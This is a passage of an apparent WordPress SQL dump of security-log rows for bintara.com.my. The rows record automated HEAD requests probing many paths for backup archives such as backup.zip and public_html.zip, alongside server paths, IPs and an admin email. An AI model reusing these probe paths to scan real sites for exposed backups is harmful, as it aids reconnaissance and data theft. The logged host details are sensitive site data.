Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"http://bintara.com.my/portal/public_html.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/portal/public_html.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mEgAAAQY\";s:12:\"REDIRECT_URL\";s:23:\"/portal/public_html.zip\";s:11:\"REMOTE_ADDR\";s:11:\"217.78.6.15\";s:11:\"REMOTE_PORT\";s:5:\"50583\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"http://bintara.com.my/portal/public_html.zip\";s:10:\"SCRIPT_URL\";s:23:\"/portal/public_html.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5M1pB8LtYU@MYZI46mEgAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606872.3423\";s:12:\"REQUEST_TIME\";s:10:\"1569606872\";}}','notice','2019-09-27 17:55:31','2019-09-27 17:54:35',35514840,37320264,'http://bintara.com.my/portal/public_html.zip',1,0,'217.78.6.15'),(27212,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/newsite/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/newsite/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/newsite/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaXKlfXTtZ68oOVBXxgAAAVI\";s:12:\"REDIRECT_URL\";s:19:\"/newsite/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45284\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/newsite/backup.zip\";s:10:\"SCRIPT_URL\";s:19:\"/newsite/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaXKlfXTtZ68oOVBXxgAAAVI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607017.4396\";s:12:\"REQUEST_TIME\";s:10:\"1569607017\";}}','notice','2019-09-27 17:57:06','2019-09-27 17:56:58',35125912,36934432,'http://bintara.com.my/newsite/backup.zip',1,0,'66.84.10.30'),(27213,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/news/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/news/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/news/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaXKlfXTtZ68oOVBXyAAAAVM\";s:12:\"REDIRECT_URL\";s:16:\"/news/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45312\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/news/backup.zip\";s:10:\"SCRIPT_URL\";s:16:\"/news/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaXKlfXTtZ68oOVBXyAAAAVM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607017.6856\";s:12:\"REQUEST_TIME\";s:10:\"1569607017\";}}','notice','2019-09-27 17:57:06','2019-09-27 17:56:58',35126992,36927216,'http://bintara.com.my/news/backup.zip',1,0,'66.84.10.30'),(27214,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/website/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/website/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/website/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaXKlfXTtZ68oOVBXxwAAAUk\";s:12:\"REDIRECT_URL\";s:19:\"/website/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45302\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/website/backup.zip\";s:10:\"SCRIPT_URL\";s:19:\"/website/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaXKlfXTtZ68oOVBXxwAAAUk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607017.7478\";s:12:\"REQUEST_TIME\";s:10:\"1569607017\";}}','notice','2019-09-27 17:57:30','2019-09-27 17:56:59',35124280,36924080,'http://bintara.com.my/website/backup.zip',1,0,'66.84.10.30'),(27215,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/www/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/www/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/www/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaXKlfXTtZ68oOVBXywAAAUA\";s:12:\"REDIRECT_URL\";s:15:\"/www/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45288\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/www/backup.zip\";s:10:\"SCRIPT_URL\";s:15:\"/www/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaXKlfXTtZ68oOVBXywAAAUA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569607017.647\";s:12:\"REQUEST_TIME\";s:10:\"1569607017\";}}','notice','2019-09-27 17:57:30','2019-09-27 17:56:58',35126424,36925032,'http://bintara.com.my/www/backup.zip',1,0,'66.84.10.30'),(27216,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/demo/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/demo/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/demo/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaZB8LtYU@MYZI46mLgAAAQo\";s:12:\"REDIRECT_URL\";s:16:\"/demo/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45310\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/demo/backup.zip\";s:10:\"SCRIPT_URL\";s:16:\"/demo/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaZB8LtYU@MYZI46mLgAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607017.7152\";s:12:\"REQUEST_TIME\";s:10:\"1569607017\";}}','notice','2019-09-27 17:57:30','2019-09-27 17:56:59',35126992,36927216,'http://bintara.com.my/demo/backup.zip',1,0,'66.84.10.30'),(27217,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2018/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/2018/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2018/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUQgAAAIU\";s:12:\"REDIRECT_URL\";s:16:\"/2018/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45314\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/2018/backup.zip\";s:10:\"SCRIPT_URL\";s:16:\"/2018/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUQgAAAIU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569607017.965\";s:12:\"REQUEST_TIME\";s:10:\"1569607017\";}}','notice','2019-09-27 17:57:30','2019-09-27 17:56:58',35126992,36927216,'http://bintara.com.my/2018/backup.zip',1,0,'66.84.10.30'),(27218,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaZB8LtYU@MYZI46mKwAAARg\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45320\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/backup.zip\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaZB8LtYU@MYZI46mKwAAARg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607017.9365\";s:12:\"REQUEST_TIME\";s:10:\"1569607017\";}}','notice','2019-09-27 17:57:30','2019-09-27 17:56:59',35127528,36935960,'http://bintara.com.my/wordpress/backup.zip',1,0,'66.84.10.30'),(27219,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/cms/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/cms/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaZB8LtYU@MYZI46mLAAAARc\";s:12:\"REDIRECT_URL\";s:15:\"/cms/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45276\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/backup.zip\";s:10:\"SCRIPT_URL\";s:15:\"/cms/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaZB8LtYU@MYZI46mLAAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607019.0041\";s:12:\"REQUEST_TIME\";s:10:\"1569607019\";}}','notice','2019-09-27 17:57:39','2019-09-27 17:57:02',35126984,36926496,'http://bintara.com.my/cms/backup.zip',1,0,'66.84.10.30'),(27220,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaXKlfXTtZ68oOVBXyQAAAVE\";s:12:\"REDIRECT_URL\";s:15:\"/new/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45304\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/backup.zip\";s:10:\"SCRIPT_URL\";s:15:\"/new/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaXKlfXTtZ68oOVBXyQAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607018.9918\";s:12:\"REQUEST_TIME\";s:10:\"1569607018\";}}','notice','2019-09-27 17:57:39','2019-09-27 17:57:02',35126984,36926496,'http://bintara.com.my/new/backup.zip',1,0,'66.84.10.30'),(27221,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp2/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 